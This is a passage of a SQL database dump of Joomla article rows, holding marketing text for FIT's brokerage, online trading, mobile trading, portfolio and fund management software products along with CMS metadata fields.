05:38:00',736,'','2015-06-26 05:52:26',736,736,'2015-06-26 05:52:26','2015-03-15 05:38:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,11,'','',1,2216,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(118,259,'FIT Products Portfolio includes:','fit-products-portfolio-includes','<p>Besides ready-made applications already working in the Middle East area, FIT is provide its customers with expertise in the following sectors:</p>\r\n','\r\n<ul>\r\n<li>Consultancy – Supporting its customers in the design phase, keeping in consideration every aspect of the system: technical, functional, and architectural;</li>\r\n<li>Design and Development – Through its specialized workgroups, the company can develop any type of complete solution, built on the assets of knowledge and experiences;</li>\r\n<li>Systems Support and Maintenance – Delivered to the customers for any type of requirement relevant to software, application management and data-stream.</li>\r\n</ul>\r\n<p> </p>\r\n<p>Through (solutions, consultancy, design and development, support and maintenance) FIT provides four products to customers in the Gulf Region: </p>\r\n<ul>\r\n<li>Real Time Brokerage System;</li>\r\n<li>Wealth Management Software;</li>\r\n<li>Portfolio Management Software;</li>\r\n<li>IPO Manager.</li>\r\n</ul>\r\n<p><img src=\"images/fitInclude.PNG\" alt=\"\" /></p>',1,14,'2015-04-12 18:33:39',736,'','2015-07-08 07:08:00',736,0,'0000-00-00 00:00:00','2015-04-12 18:33:39','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',7,10,'','',1,2406,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(119,260,'Brokerage Management Solution (WASATA)','brokerage-management-solution-wasata','<p><b>wasata</b> is a complete trading system developed to provide a user friendly, fast and effective electronic trading system for Banks, Brokerage Companies and other stakeholders involved in capital markets.</p>\r\n<p><b>wasata</b> is a set of modules developed to manage, in an integrated mode, the functionalities required for the administration of securities, asset management, order collections and distribution of financial products.</p>\r\n<ul>\r\n<li>Full Accounting System</li>\r\n<li>Market processors</li>\r\n<li>Financial Risk Management System</li>\r\n<li>Customer Relationship Management</li>\r\n</ul>\r\n<p><br /> <b>wasata</b> has the following characteristics:</p>\r\n<ul>\r\n<li>Multi-channel;</li>\r\n<li>Multi-market;</li>\r\n<li>Multi-information provider;</li>\r\n<li>Multi-currency;</li>\r\n<li>Multi-lingual;</li>\r\n</ul>','',1,14,'2015-04-12 19:01:36',736,'','2015-06-25 03:46:43',736,736,'2015-06-26 05:49:26','2015-04-12 19:01:36','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,9,'','',1,1853,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(120,261,'On-Line Trading System (BORSAT)','on-line-trading-system-borsat','<p><b>Borsat</b> is next generation trading platform that provides the ultimate e-Trading experience for traders, investor of all levels.</p>\r\n<p><b>Borsat</b> is a powerful trading solution that allows you to work with various brokers and data vendors from a single multifunctional front-end application</p>\r\n<p><b>Borsat </b>offers legendary fast real time straight through processing capabilities that allow trading across multiple markets. Trading services includes a complete order management system (OMS), and FIX connectivity to exchanges, and trade validations. <b>Borsat</b> connects to the back office solutions to offer accounting, wealth management, risk management, portfolio management and other related services.</p>','',1,14,'2015-04-12 19:01:36',736,'','2015-06-19 05:17:13',736,736,'2015-06-19 05:17:13','2015-04-12 19:01:36','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',5,8,'','',1,2493,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(121,262,'E-Trade – Web based solution','e-trade-web-based-solution','<p class=\"MsoListParagraph\" style=\"margin-left: 1.5in; text-indent: -.25in; mso-list: l0 level2 lfo1;\"> </p>\r\n<p class=\"MsoListParagraphCxSpFirst\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">a.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Flexibility of e-Trade Design.</span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">b.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Online integration with back office system</span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">c.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Real time prices.</span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">d.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Multi tabs design.</span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">e.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Tightly Coupling and connectivity among the screens</span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">f.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Advance menu driven system</span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">g.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">High performance data processing and order routing</span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">h.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Order Execution from different screens </span></b></p>\r\n<p class=\"MsoListParagraph\" style=\"margin-left: 1.5in; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><b style=\"text-indent: -0.25in; font-size: 12.1599998474121px; line-height: 1.3em;\"><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">i.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><b style=\"text-indent: -0.25in; font-size: 12.1599998474121px; line-height: 1.3em;\"><span style=\"font-family: \'Century Gothic\',sans-serif;\">Quick Order Entry Screen</span></b></p>\r\n<p class=\"MsoListParagraph\" style=\"margin-left: 1.5in; text-indent: -.25in; mso-list: l0 level2 lfo1;\"> </p>\r\n<p class=\"MsoListParagraph\" style=\"margin-left: 1.5in; text-indent: -.25in; mso-list: l0 level2 lfo1;\"> <a href=\"mailto: info@fitoman.com\">More Details</a></p>','',1,14,'2015-04-12 19:01:36',736,'','2015-04-12 19:10:57',736,736,'2015-06-19 05:16:54','2015-04-12 19:01:36','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,7,'','',1,1285,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(122,263,'Mobile/Tablet Trading & Information Dissemination','mobile-tablet-trading-information-dissemination','<p class=\"MsoListParagraph\" style=\"margin-left: 1.5in; text-indent: -.25in; mso-list: l0 level2 lfo1;\"> </p>\r\n<p class=\"MsoListParagraphCxSpFirst\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">a.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Online integration with Back Office System</span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">b.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Compatibility across a range of devices , HTML5 app will work on different mobile OS’s, whether that’s iOS, Android, Windows Phone or Blackberry</span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">c.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Easy installation and maintenance</span></b></p>\r\n<p class=\"MsoListParagraphCxSpLast\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">d.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Graphs/Charts</span></b></p>\r\n<p class=\"MsoListParagraphCxSpLast\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"> </p>\r\n<p class=\"MsoListParagraph\" style=\"margin-left: 1.5in; text-indent: -.25in; mso-list: l0 level2 lfo1;\"> <a href=\"mailto: info@fitoman.com\">More Details</a></p>','',1,14,'2015-04-12 19:01:36',736,'','2015-04-12 19:18:35',736,736,'2015-06-11 06:18:41','2015-04-12 19:01:36','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,6,'','',1,1229,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(123,264,'Interfaces with:','interfaces-with','<p class=\"MsoListParagraphCxSpFirst\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">a.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Reuters Order Routing </span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">b.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Bloomberg Interface</span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">c.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Core Banking Application</span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">d.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">SWIFT Interface</span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">e.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Call Center Interfaces</span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">f.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">IVR interfaces</span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">g.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">SMS Gateway</span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">h.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Fax Interfaces</span></b></p>\r\n<p class=\"MsoListParagraphCxSpLast\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">i.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Email Interfaces</span></b></p>\r\n<p class=\"MsoListParagraphCxSpLast\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"> </p>\r\n<p class=\"MsoListParagraph\" style=\"margin-left: 1.5in; text-indent: -.25in; mso-list: l0 level2 lfo1;\"> <a href=\"mailto: info@fitoman.com\">More Details</a></p>','',1,14,'2015-04-12 19:01:36',736,'','2015-04-12 19:24:36',736,736,'2015-06-11 06:18:41','2015-04-12 19:01:36','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,5,'','',1,1130,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(124,265,'Portfolio Management Solutions','portfolio-management-solutions','<p>Portfolio management software will account for your clients investment portfolios and give him a statement of all of his investment holdings or just the investment portfolio(s) you are managing. These systems incorporate varying features and as a result, each program may appeal to differing investment practices. Typical portfolio systems can be updated daily via Broker/Dealer and Mutual Fund downloads, pricing services via internet or manually entered.</p>','',1,14,'2015-04-12 19:01:36',736,'','2015-06-11 06:19:08',736,736,'2015-07-08 06:03:44','2015-04-12 19:01:36','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,4,'','',1,1580,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(125,266,'FUND Management Solutions','fund-management-solutions','<p>It helps investors track and analyze their stocks, mutual funds, and other investments with a wide variety of easy to use graphs and reports. Fund Manager makes keeping track of your investments easy by updating prices and retrieving your transactions from the Internet with the push of a button.</p>','',1,14,'2015-04-12 19:01:36',736,'','2015-06-09 06:16:17',736,736,'2015-06-09 06:16:17','2015-04-12 19:01:36','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,3,'','',1,1750,'{